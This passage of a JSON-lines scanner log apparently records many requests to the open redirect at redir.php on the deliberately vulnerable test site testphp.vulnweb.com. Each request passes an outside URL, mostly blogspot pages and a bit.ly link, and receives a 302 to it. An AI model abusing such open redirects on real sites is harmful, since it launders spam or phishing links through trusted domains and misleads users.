tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:46.8916242Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://alittleinnonpleasantbay.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://alittleinnonpleasantbay.blogspot.com/management.html\",\"location\":\"http://alittleinnonpleasantbay.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://alittleinnonpleasantbay.blogspot.com/management.html\",\"time\":\"338.820236ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:48.208933086Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://allenferguson.tumblr.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://allenferguson.tumblr.com\",\"location\":\"http://allenferguson.tumblr.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://allenferguson.tumblr.com\",\"time\":\"348.178881ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:48.23721128Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://allkeyboardstop.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://allkeyboardstop.blogspot.com/\",\"location\":\"http://allkeyboardstop.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://allkeyboardstop.blogspot.com/\",\"time\":\"356.730518ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:48.557095508Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://allkeyboardstop.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://allkeyboardstop.blogspot.com/management.html\",\"location\":\"http://allkeyboardstop.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://allkeyboardstop.blogspot.com/management.html\",\"time\":\"342.682509ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:49.428691559Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://alraziuni.edu.ye\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://alraziuni.edu.ye\",\"location\":\"http://alraziuni.edu.ye\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://alraziuni.edu.ye\",\"time\":\"352.43539ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:49.454344998Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://alraziuni.edu.ye/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://alraziuni.edu.ye/\",\"location\":\"http://alraziuni.edu.ye/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://alraziuni.edu.ye/\",\"time\":\"351.757359ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:49.495828444Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://alwaqie.net/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://alwaqie.net/\",\"location\":\"http://alwaqie.net/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://alwaqie.net/\",\"time\":\"347.325268ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:49.519182369Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://amtvnews.online\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://amtvnews.online\",\"location\":\"http://amtvnews.online\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://amtvnews.online\",\"time\":\"356.652756ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:49.815460334Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://analysisoasis.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://analysisoasis.com/\",\"location\":\"http://analysisoasis.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://analysisoasis.com/\",\"time\":\"343.38813ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:49.860417677Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://analysisoasis.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://analysisoasis.com/management.html\",\"location\":\"http://analysisoasis.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://analysisoasis.com/management.html\",\"time\":\"352.306166ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:49.869693129Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://andresu26h8.oblogation.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://andresu26h8.oblogation.com/\",\"location\":\"http://andresu26h8.oblogation.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://andresu26h8.oblogation.com/\",\"time\":\"356.35167ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:49.942245428Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://anekkaapoker.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://anekkaapoker.blogspot.com/\",\"location\":\"http://anekkaapoker.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://anekkaapoker.blogspot.com/\",\"time\":\"357.020138ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:49.984219854Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://asancup.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://asancup.com//\",\"location\":\"http://asancup.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://asancup.com//\",\"time\":\"343.578769ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:50.085226146Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://ascentlawfirm.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://ascentlawfirm.com\",\"location\":\"http://ascentlawfirm.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://ascentlawfirm.com\",\"time\":\"342.761374ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:50.150280034Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://asdafawqa.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://asdafawqa.blogspot.com/\",\"location\":\"http://asdafawqa.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://asdafawqa.blogspot.com/\",\"time\":\"343.726657ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:50.188248789Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://astronomyscience2.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://astronomyscience2.blogspot.com/\",\"location\":\"http://astronomyscience2.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://astronomyscience2.blogspot.com/\",\"time\":\"348.133845ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:50.242316874Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://avatarkeyboardapp.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://avatarkeyboardapp.blogspot.com/\",\"location\":\"http://avatarkeyboardapp.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://avatarkeyboardapp.blogspot.com/\",\"time\":\"352.356067ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:50.323632491Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://avatarkeyboardapp.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://avatarkeyboardapp.blogspot.com/management.html\",\"location\":\"http://avatarkeyboardapp.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://avatarkeyboardapp.blogspot.com/management.html\",\"time\":\"342.043578ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:50.401873906Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://ayeshadev122.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://ayeshadev122.blogspot.com\",\"location\":\"http://ayeshadev122.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://ayeshadev122.blogspot.com\",\"time\":\"347.046035ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:50.481761366Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://baji.co.in\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://baji.co.in\",\"location\":\"http://baji.co.in\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://baji.co.in\",\"time\":\"344.498393ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:53.701882742Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://banai.cz/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://banai.cz/\",\"location\":\"http://banai.cz/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://banai.cz/\",\"time\":\"352.391183ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:53.848390396Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://bargeorgeim.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://bargeorgeim.blogspot.com/\",\"location\":\"http://bargeorgeim.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://bargeorgeim.blogspot.com/\",\"time\":\"353.342976ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:53.944857466Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://bargeorgeim.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://bargeorgeim.blogspot.com/management.html\",\"location\":\"http://bargeorgeim.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://bargeorgeim.blogspot.com/management.html\",\"time\":\"343.028735ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:53.993158375Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://bhalukingweb.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://bhalukingweb.blogspot.com\",\"location\":\"http://bhalukingweb.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://bhalukingweb.blogspot.com\",\"time\":\"348.250883ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:54.349899333Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://bhalukingweb.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://bhalukingweb.blogspot.com/\",\"location\":\"http://bhalukingweb.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://bhalukingweb.blogspot.com/\",\"time\":\"352.468287ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:54.753090152Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://bhalukingweb.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://bhalukingweb.blogspot.com/management.html\",\"location\":\"http://bhalukingweb.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://bhalukingweb.blogspot.com/management.html\",\"time\":\"342.729303ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:54.779182224Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://bio-link38260.blog-gold.com/21298170/the-top-things-to-look-for-when-picking-an-rv-center-for-your-rv-needs/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://bio-link38260.blog-gold.com/21298170/the-top-things-to-look-for-when-picking-an-rv-center-for-your-rv-needs/\",\"location\":\"http://bio-link38260.blog-gold.com/21298170/the-top-things-to-look-for-when-picking-an-rv-center-for-your-rv-needs/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://bio-link38260.blog-gold.com/21298170/the-top-things-to-look-for-when-picking-an-rv-center-for-your-rv-needs/\",\"time\":\"347.622753ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:54.990211156Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://bislimgeorgemk.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://bislimgeorgemk.blogspot.com/management.html\",\"location\":\"http://bislimgeorgemk.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://bislimgeorgemk.blogspot.com/management.html\",\"time\":\"340.136912ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:55.523360209Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://bit.ly/3kGy1Gr\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://bit.ly/3kGy1Gr\",\"location\":\"http://bit.ly/3kGy1Gr\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://bit.ly/3kGy1Gr\",\"time\":\"356.700589ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:55.578329974Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://blankie01.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://blankie01.blogspot.com/\",\"location\":\"http://blankie01.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://blankie01.blogspot.com/\",\"time\":\"345.066784ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:57.248510087Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://blankie02.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://blankie02.blogspot.com/\",\"location\":\"http://blankie02.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://blankie02.blogspot.com/\",\"time\":\"354.80444ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:58.552446981Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://blooketplayer.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://blooketplayer.blogspot.com/\",\"location\":\"http://blooketplayer.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://blooketplayer.blogspot.com/\",\"time\":\"342.066454ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:58.593104474Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://blooketplayer.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://blooketplayer.blogspot.com/management.html\",\"location\":\"http://blooketplayer.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://blooketplayer.blogspot.com/management.html\",\"time\":\"354.158691ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:58.90620542Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://bollywood-movies-2022.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://bollywood-movies-2022.blogspot.com\",\"location\":\"http://bollywood-movies-2022.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://bollywood-movies-2022.blogspot.com\",\"time\":\"347.691728ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:59.780324787Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://bollywood-movies-2022.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://bollywood-movies-2022.blogspot.com/\",\"location\":\"http://bollywood-movies-2022.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://bollywood-movies-2022.blogspot.com/\",\"time\":\"349.261718ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:59.809091332Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://bollywood-movies-2022.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://bollywood-movies-2022.blogspot.com/management.html\",\"location\":\"http://bollywood-movies-2022.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://bollywood-movies-2022.blogspot.com/management.html\",\"time\":\"352.14666ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}